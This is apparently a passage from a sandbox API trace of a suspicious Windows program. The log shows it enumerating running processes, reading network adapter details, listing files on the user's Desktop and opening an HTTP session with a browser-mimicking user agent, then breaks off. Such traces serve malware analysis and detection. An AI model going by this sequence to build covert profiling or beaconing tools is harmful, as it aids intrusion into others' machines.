1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.292] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x76 | out: _MbCh="v\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x63 | out: _MbCh="c\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x68 | out: _MbCh="h\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x74 | out: _MbCh="t\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.293] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.293] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.293] wctomb (in: _MbCh=0xe21404, _WCh=0x76 | out: _MbCh="v\x07\x7f") returned 1 [0030.293] wctomb (in: _MbCh=0xe21404, _WCh=0x63 | out: _MbCh="c\x07\x7f") returned 1 [0030.293] wctomb (in: _MbCh=0xe21404, _WCh=0x68 | out: _MbCh="h\x07\x7f") returned 1 [0030.293] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x07\x7f") returned 1 [0030.293] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.293] wctomb (in: _MbCh=0xe21404, _WCh=0x74 | out: _MbCh="t\x07\x7f") returned 1 [0030.293] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.293] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.293] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.293] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.293] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x61 | out: _MbCh="a\x07\x7f") returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x75 | out: _MbCh="u\x07\x7f") returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x64 | out: _MbCh="d\x07\x7f") returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x69 | out: _MbCh="i\x07\x7f") returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x07\x7f") returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x64 | out: _MbCh="d\x07\x7f") returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x67 | out: _MbCh="g\x07\x7f") returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.294] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x76 | out: _MbCh="v\x07\x7f") returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x63 | out: _MbCh="c\x07\x7f") returned 1 [0030.294] wctomb (in: _MbCh=0xe21404, _WCh=0x68 | out: _MbCh="h\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x74 | out: _MbCh="t\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.295] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x76 | out: _MbCh="v\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x63 | out: _MbCh="c\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x68 | out: _MbCh="h\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x74 | out: _MbCh="t\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.295] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.295] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0030.296] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.296] wctomb (in: _MbCh=0xe21404, _WCh=0x70 | out: _MbCh="p\x07\x7f") returned 1 [0030.296] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x07\x7f") returned 1 [0030.296] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x07\x7f") returned 1 [0030.296] wctomb (in: _MbCh=0xe21404, _WCh=0x6c | out: _MbCh="l\x07\x7f") returned 1 [0030.296] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.296] wctomb (in: _MbCh=0xe21404, _WCh=0x76 | out: _MbCh="v\x07\x7f") returned 1 [0030.296] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.296] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.296] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.296] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.296] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.296] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x76 | out: _MbCh="v\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x63 | out: _MbCh="c\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x68 | out: _MbCh="h\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x74 | out: _MbCh="t\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.297] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x4f | out: _MbCh="O\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x66 | out: _MbCh="f\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x66 | out: _MbCh="f\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x69 | out: _MbCh="i\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x63 | out: _MbCh="c\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x43 | out: _MbCh="C\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x6c | out: _MbCh="l\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x69 | out: _MbCh="i\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x63 | out: _MbCh="c\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x6b | out: _MbCh="k\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x54 | out: _MbCh="T\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x52 | out: _MbCh="R\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x75 | out: _MbCh="u\x07\x7f") returned 1 [0030.297] wctomb (in: _MbCh=0xe21404, _WCh=0x6e | out: _MbCh="n\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.298] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x74 | out: _MbCh="t\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x61 | out: _MbCh="a\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x6b | out: _MbCh="k\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x68 | out: _MbCh="h\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x74 | out: _MbCh="t\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.298] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.298] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x314, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0030.299] wctomb (in: _MbCh=0xe21404, _WCh=0x64 | out: _MbCh="d\x07\x7f") returned 1 [0030.299] wctomb (in: _MbCh=0xe21404, _WCh=0x77 | out: _MbCh="w\x07\x7f") returned 1 [0030.299] wctomb (in: _MbCh=0xe21404, _WCh=0x6d | out: _MbCh="m\x07\x7f") returned 1 [0030.299] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.299] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.299] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.299] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.299] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x544, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0030.303] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.303] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0030.303] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x35c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0030.304] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0030.304] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0030.305] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0030.305] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="astronomy wrote lies springfield.exe")) returned 1 [0030.306] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="nav_king_forums.exe")) returned 1 [0030.306] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="bodiestournamentsrickfold.exe")) returned 1 [0030.307] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="combinations_horizon.exe")) returned 1 [0030.307] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="browsing contributions winter tab.exe")) returned 1 [0030.308] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="planets-legends-retailers-declaration.exe")) returned 1 [0030.308] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="tell russia foo.exe")) returned 1 [0030.309] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="cells designed.exe")) returned 1 [0030.309] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="cuts_hill.exe")) returned 1 [0030.310] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="olympic.exe")) returned 1 [0030.310] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="christopher counting nose ve.exe")) returned 1 [0030.311] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="submit.exe")) returned 1 [0030.311] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="earthquake_mysql_organizer.exe")) returned 1 [0030.312] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="multiple-diamonds-salon-hepatitis.exe")) returned 1 [0030.312] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="nevadaworthstakeholders.exe")) returned 1 [0030.313] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="terrace.exe")) returned 1 [0030.313] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphic-conspiracy-dialogue-opt.exe")) returned 1 [0030.314] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="ltd_ul_catholic_interracial.exe")) returned 1 [0030.314] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="septfleet.exe")) returned 1 [0030.315] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="introductory_flickr_wool.exe")) returned 1 [0030.316] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="hour.exe")) returned 1 [0030.316] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="prayer lord miniature carmen.exe")) returned 1 [0030.317] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0030.317] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.318] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0030.318] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0030.319] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 0 [0030.319] CloseHandle (hObject=0x1a4) returned 1 [0030.319] GetAdaptersInfo (in: AdapterInfo=0x3526e0, SizePointer=0xe21950 | out: AdapterInfo=0x3526e0, SizePointer=0xe21950) returned 0x0 [0030.321] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0xe21868, csidl=16, fCreate=0 | out: pszPath="C:\\Users\\aETAdzjz\\Desktop") returned 1 [0030.322] _findfirst (param_1="C:\\Users\\aETAdzjz\\Desktop\\*.*", param_2=0xe21750) returned 0x6177c8 [0030.329] _findnext (param_1=0x6177c8, param_2=0xe21750) returned 0 [0030.329] _findnext (param_1=0x6177c8, param_2=0xe21750) returned 0 [0030.330] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, 